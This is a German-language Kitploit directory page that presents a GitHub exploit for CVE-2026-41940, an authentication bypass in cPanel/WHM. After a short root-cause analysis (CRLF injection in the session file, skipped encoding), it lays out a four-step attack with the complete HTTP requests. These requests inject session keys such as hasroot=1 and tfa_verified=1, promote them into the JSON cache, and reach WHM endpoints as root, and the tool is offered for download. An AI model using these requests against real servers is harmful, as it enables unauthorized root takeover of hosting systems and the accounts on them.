Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940-cPanel-Auth-Bypass-Exploit — Exploit für CVE-2026-41940, eine Authentifizierungsumgehung in cPanel/WHM, die es nicht authentifizierten Angreifern ermöglicht, über Session-Injection und JSON-Cache-Promotion Root-Zugriff zu erlangen. | Kitploit
Tools/GitHubGitHub/kmaruthisrikar/cve-2026-41940-cpanel-auth-bypass-exploit
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubkmaruthisrikar/cve-2026-41940-cpanel-auth-bypass-exploit

CVE-2026-41940-cPanel-Auth-Bypass-Exploit

Exploit für CVE-2026-41940, eine Authentifizierungsumgehung in cPanel/WHM, die es nicht authentifizierten Angreifern ermöglicht, über Session-Injection und JSON-Cache-Promotion Root-Zugriff zu erlangen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
21vor 3 MonatenNoch nicht geprüft

CVE-2026-41940: Analyse der Authentifizierungsumgehung in cPanel/WHM

Überblick über die Schwachstelle

CVE-2026-41940 ist eine kritische Schwachstelle zur Authentifizierungsumgehung in cPanel & WHM, die alle derzeit unterstützten Versionen betrifft. Sie ermöglicht es einem nicht authentifizierten Angreifer, die Authentifizierung zu umgehen und Root-Zugriff (WHM) oder Benutzerzugriff (cPanel) zu erlangen.

Technische Grundursache

Die Schwachstelle beruht auf zwei Hauptproblemen in Cpanel/Session.pm:

  1. CRLF-Injection in saveSession: Die Funktion saveSession hat die Eingabe vor dem Schreiben in die Sitzungsdatei auf der Festplatte nicht ordnungsgemäß bereinigt. Insbesondere wurden Zeilenumbruchzeichen (\n) aus dem Feld pass nicht entfernt.
  2. Bedingte Umgehung der Kodierung: Das Feld pass in der Sitzungsdatei wird normalerweise mit einem pro Sitzung gültigen Geheimnis (ob) verschlüsselt. Wenn das Sitzungscookie jedoch nicht den Teil ob (den Teil nach dem Komma) enthält, wird die Kodierung übersprungen und der Wert von pass im Klartext geschrieben.

Ausführungsprozess

Die Ausnutzung ist ein mehrstufiger Prozess:

1. Erstellen einer Pre-Auth-Sitzung

Senden Sie einen fehlgeschlagenen Anmeldeversuch, um die Erstellung einer Sitzungsdatei auf der Festplatte auszulösen.

root@kitploit:~
POST /login/?login_only=1 HTTP/1.1
Host: target:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=anything

Der Server antwortet mit einem whostmgrsession-Cookie, z. B. whostmgrsession=:Wg_mjzgt1hyfXefK,1bd3d4....

2. Injizieren bösartiger Sitzungsschlüssel

Senden Sie eine weitere Anfrage mit dem Sitzungscookie, aber entfernen Sie den Teil ob (das Komma und alles danach). Injizieren Sie im Feld pass die gewünschten Sitzungsschlüssel mithilfe von Zeilenumbrüchen.

root@kitploit:~
POST /login/?login_only=1 HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=:Wg_mjzgt1hyfXefK
Content-Type: application/x-www-form-urlencoded

user=root&pass=x%0atfa_verified=1%0ahasroot=1%0asuccessful_internal_auth_with_timestamp=1777462149

Da der Teil ob fehlt, schreibt cpsrvd den Wert von pass unkodiert. Die injizierten Zeilenumbrüche führen dazu, dass die nachfolgenden Zeilen als separate Schlüssel-Wert-Paare in der Roh-Sitzungsdatei interpretiert werden.

3. Injizierte Daten in den JSON-Cache übernehmen

cPanel verwendet einen JSON-Cache für Sitzungen. Die Roh-Injektion befindet sich nur in der Textdatei. Um sie „aktiv“ zu machen, müssen wir cPanel zwingen, die Rohdatei erneut zu lesen und den JSON-Cache zu aktualisieren. Dies kann durch das Auslösen eines „Token Denied“-Fehlers auf einem Endpunkt erfolgen, der Cpanel::Session::Modify verwendet.

root@kitploit:~
GET /scripts2/listaccts HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=:Wg_mjzgt1hyfXefK

Das fehlende Sicherheitstoken in der URL löst do_token_denied aus, das Cpanel::Session::Modify verwendet, um den Zähler token_denied zu aktualisieren. Modify liest die Rohdatei (unter Umgehung des Caches) und schreibt dann sowohl die Rohdatei als auch den JSON-Cache, wodurch unsere injizierten Schlüssel effektiv auf die oberste Ebene des JSON-Caches befördert werden.

4. Zugriff auf geschützte Endpunkte

Nun ist die Sitzung in den Augen von cPanel vollständig „authentifiziert“. Der Schlüssel successful_internal_auth_with_timestamp umgeht die Prüfung von /etc/shadow.

root@kitploit:~
GET /cpsess[TOKEN]/json-api/version HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=:Wg_mjzgt1hyfXefK

Das [TOKEN] kann aus dem Feld cp_security_token in der Sitzung abgerufen werden, das häufig in der „Token Denied“-Antwort zurückgegeben wird oder durch Untersuchung des Verhaltens des Sitzungscookies gefunden werden kann.

Wichtige injizierte Felder

  • tfa_verified=1: Umgeht die Zwei-Faktor-Authentifizierung.
  • hasroot=1: Gewährt Root-Rechte in WHM.
  • successful_internal_auth_with_timestamp=[TIMESTAMP]: Umgeht die tatsächliche Passwortprüfung gegen die System-Shadow-Datei.
  • user=root: Setzt den Sitzungsbenutzer auf root.
Tool herunterladen